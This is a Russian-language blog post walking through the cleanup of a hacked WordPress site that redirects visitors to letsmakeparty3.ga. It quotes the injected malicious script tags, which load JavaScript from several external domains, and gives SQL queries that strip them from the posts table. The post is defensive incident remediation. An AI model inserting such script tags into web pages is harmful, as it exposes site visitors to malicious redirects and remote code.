Теги

    Комментарии ()

      +
      T
      >

      Массовый взлом сайтов на WordPress, лечим сайт ( letsmakeparty3.ga )

      /* Превью

      В общем как обычно. На этот раз какой то letsmakeparty3.ga

      */

      В кратце, есть сайт на всратом вп, на днях его взломали, навернулась админка, и с сайта идут редиректы, в шапке сайта адреса типа letsmakeparty3.ga
      Больше всего меня в этой истории раздосадовало то что антивирус для сайтов AI-Bolit от revisium напроч не хочет работать, и перестал поддерживать винду, хорошо что у меня осталась старая версия, которая работает..

      И так, лечим, по порядочку.

      1. Восстанавливаем админку, для этого в корне в файле `wp-config.php` в самом начале вставляем
        
              define( 'WP_HOME', 'http://новый-адрес-сайта.ru' );
              define( 'WP_SITEURL', 'http://новый-адрес-сайта.ru' );
            
      2. Тянем файлы на сайта на комп, Качаем старую версию ai-bolit для винды, или новую под линукс с сайтаrevisium, или если ты, %USER_NAME% разберешься, то там и на сайт можно залить, и про сканировать на вирусы, я тупой у меня не получилось.
      3. Если под винду, то после распаковки архива, закинуть к файлам папку с сайтом, назвать её site, и клацнуть по `start_paranoic.bat`
        После сканирования смотреть отчёт в файле `AI-BOLIT-REPORT.html`
      4. Удаляем заражённые файлы, у меня они были преимущественно в папке `wp-content/wflogs`, я грохнул всю папку к херам.
      5. После чего на всякий случай ещё грохнул папку с кэшем `/wp-content/cache`
      6. Меняем адрес сайта в базе
        Не надо забывать, при любой работе с базой, делать бэк ап,
        таблица `wp_options` ячейки `siteurl` и `home` тоже меняем адрес на тот что надо
      7. Теперь нужно чистить таблицу `wp_posts` там в колонке `post_content` практически везде поднасрали таким кодом
        
              <script src='https://letsmakeparty3.ga/l.js?n=1' type=text/javascript></script><script src='https://dontstopthismusics.com/song/?type=2' type=text/javascript></script><script src='https://blackentertainments.com/check/?type=2' type=text/javascript></script><script src='https://lobbydesires.com/location.js?n=1' type=text/javascript></script>
            
        Точнее сначала идёт код
        
              <script src='https://letsmakeparty3.ga/l.js?n=1' type=text/javascript></script>
            
        Потом контент, потом остатки
        
              <script src='https://dontstopthismusics.com/song/?type=2' type=text/javascript></script><script src='https://blackentertainments.com/check/?type=2' type=text/javascript></script><script src='https://lobbydesires.com/location.js?n=1' type=text/javascript></script>
            
        Причём были посты тупо содержащий только этот код, по этому сначала избавляюсь от них, mySQL запросом.
      8. Чистим посты содержащие только скрипты, у меня их вышло 262 штуки.
        
            DELETE FROM `wp_posts` WHERE `post_content` = "<script src='https://letsmakeparty3.ga/l.js?n=1' type=text/javascript></script><script src='https://dontstopthismusics.com/song/?type=2' type=text/javascript></script><script src='https://blackentertainments.com/check/?type=2' type=text/javascript></script><script src='https://lobbydesires.com/location.js?n=1' type=text/javascript></script>"
            
      9. Теперь работа по хитрее, нужно грохать только говноскрипт не задевая контент.
        
            UPDATE `wp_posts` SET `post_content` = REPLACE(post_content, "<script src='https://letsmakeparty3.ga/l.js?n=1' type=text/javascript></script>", "");
            
        Минус ещё кучу строк говнеца
      10. Добиваем остатки
        
            UPDATE `wp_posts` SET `post_content` = REPLACE(post_content, "<script src='https://dontstopthismusics.com/song/?type=2' type=text/javascript></script><script src='https://blackentertainments.com/check/?type=2' type=text/javascript></script><script src='https://lobbydesires.com/location.js?n=1' type=text/javascript></script>", "");
            
      11. Осторожненько заходим на сайт. Нужно помнить что некоторые браузеры любят запоминать редиректы, по этому надо сбрасывать кэш, или юзать инкогнито для проверки результата. У меня всё чикибамбони

      Важно понимать что этими действиями удаляются последствия заражения, но дыра через которое оно произошло остаётся, я не совсем понял как именно произошло заражения, антивирусом кажеться нашёл бэкдор, но он был старый :D так что если ты, %USER_NAME% знаешь через какую форточку надуло этот говнокод, не стесняйся написать в комменты или на почту (Кажется ветер дул со стороны Китая, судя по IP).

      Лучший способ защититься от взломов на WP, перейти с WP на какую нибудь нормальную CMS